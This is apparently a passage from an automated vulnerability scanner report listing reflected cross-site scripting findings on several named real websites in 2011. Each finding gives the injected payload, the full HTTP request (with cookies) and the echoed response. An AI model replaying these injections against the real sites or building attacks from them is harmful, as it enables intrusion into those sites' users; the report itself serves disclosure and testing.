The value of the trackingInfo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 669e8"%3balert(1)//208669ffb5b was submitted in the trackingInfo parameter. This input was echoed as 669e8";alert(1)//208669ffb5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /upsellitJS4.jsp?qs=237274223205335307291298312323312298291312293277335341334322&siteID=5512&trackingInfo=http%3A//roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/669e8"%3balert(1)//208669ffb5b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com
Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; uid=CgoKBU20gu++zjv3FP/AAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:26:03 GMT
Content-Type: text/html
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 16942

var USItimerID = '';
var properClickThrough = false;
var USIdone = false;
var USI_suppress = false;
if (typeof(noChatPlease) != "undefined") {
   if (noChatPlease) {
   properClickThrough = true; US
...[SNIP]...
object = document.getElementById('USI_overlayDiv');
           overlay_object.style.display = 'none';
       }
   }
   catch (Error) {}
}


var link1 = "http://roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/669e8";alert(1)//208669ffb5b", link2 = "", link3 = "", chatID = "210271614375913095075", usi_country = "us", agentName = "Jenny";

   window_left = 10;
   window_top = 100;


function usi_LoadDynamics(theURL) {
   try {
   var US
...[SNIP]...

6.405. http://www.hotelclub.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eb7"><script>alert(1)</script>7915b0ca952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=12eb7"><script>alert(1)</script>7915b0ca952

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232790
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 13:13:24 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: AffiliateLogID=%2D1963682320; expires=Mon, 23-May-2011 14:00:00 GMT; path=/
Set-Cookie: anon=54655092954620110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQSSAQDRQ=AADPBCECPKGHNOFGNCIEEIBL; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273c45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<meta name="DCSext.rs" content="http://www.google.com/search?hl=en&q=12eb7"><script>alert(1)</script>7915b0ca952"/>
...[SNIP]...

6.406. http://www.nextadvisor.com/credit_report_monitoring/compare.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a352"><script>alert(1)</script>af2c99c4585 was submitted in the Referer HTTP header. This input was echoed as 3a352\"><script>alert(1)</script>af2c99c4585 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1
Referer: http://www.google.com/search?hl=en&q=3a352"><script>alert(1)</script>af2c99c4585

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:04:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=3ba53a74e74e7bbb2fb96c2bae9dab6e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 55766


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="/link.php?kw=gcrmb credit monitoring service-fq-3a352\"><script>alert(1)</script>af2c99c4585_ordering209&amp;category=creditreport&amp;link=idguard4&amp;id=11" target="_blank">
...[SNIP]...

6.407. http://www.nextadvisor.com/link.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881a1"><script>alert(1)</script>c0ea8f8c816 was submitted in the Referer HTTP header. This input was echoed as 881a1\"><script>alert(1)</script>c0ea8f8c816 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=881a1"><script>alert(1)</script>c0ea8f8c816

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:26:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 42552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...
<a href="/link.php?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-881a1\"><script>alert(1)</script>c0ea8f8c816&amp;category=voip&amp;link=vonage&amp;id=632 "target="_blank">
...[SNIP]...

6.408. http://www.nextadvisor.com/pmid [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f376"><script>alert(1)</script>f66b92f9263 was submitted in the Referer HTTP header. This input was echoed as 9f376\"><script>alert(1)</script>f66b92f9263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=9f376"><script>alert(1)</script>f66b92f9263

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:31:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-9f376\"><script>alert(1)</script>f66b92f9263">
...[SNIP]...

6.409. http://www.nextadvisor.com/pmid/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61957"><script>alert(1)</script>3ad037bb494 was submitted in the Referer HTTP header. This input was echoed as 61957\"><script>alert(1)</script>3ad037bb494 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=61957"><script>alert(1)</script>3ad037bb494

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-61957\"><script>alert(1)</script>3ad037bb494">
...[SNIP]...

6.410. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 32dd0<script>alert(1)</script>545950acd64 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=194941096 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&; BMX_3PC=132dd0<script>alert(1)</script>545950acd64; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:30:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=3&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:30:13 2011&prad=253732016&arc=194941096&; expires=Sat 23-Jul-2011 12:30:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24957

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"194941096",Location:
...[SNIP]...
MX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p97174789": 'exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&', "BMX_3PC": '132dd0<script>alert(1)</script>545950acd64', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };

...[SNIP]...

6.411. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 299e3<script>alert(1)</script>04ee78f4696 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=194941096 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C299e3<script>alert(1)</script>04ee78f4696

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:30:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=3&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:30:17 2011&prad=253732016&arc=194941096&; expires=Sat 23-Jul-2011 12:30:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24957

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"194941096",Location:
...[SNIP]...
s={ "ar_p97174789": 'exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C299e3<script>alert(1)</script>04ee78f4696', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Bro
...[SNIP]...

6.412. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 14ebe<script>alert(1)</script>6914188f971 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-130334904614ebe<script>alert(1)</script>6914188f971

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:10:02 2011&recExp=Sun Apr 24 12:10:02 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:10:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303647002; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24741

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-130334904614ebe<script>alert(1)</script>6914188f971', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

6.413. http://ar.voicefive.com/bmx3/broker.pli [ar_p86169922 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p86169922 cookie is copied into the HTML document as plain text between tags. The payload abe95<script>alert(1)</script>e5f21dab9a9 was submitted in the ar_p86169922 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p86169922&PRAd=57789606&AR_C=41386432 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ar.voicefive.com
Cookie: ar_p86169922=exp=1&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:47:57 2011&prad=57789606&arc=41386432&abe95<script>alert(1)</script>e5f21dab9a9; BMX_G=method->-1,ts->1303663677; BMX_3PC=1; UID=e9305be3-24.143.206.75-1303663678

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:48:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p86169922=exp=2&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:48:06 2011&abe95<script>alert(1)</script>e5f21dab9a9=&prad=57789606&arc=41386432&; expires=Sat 23-Jul-2011 16:48:06 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
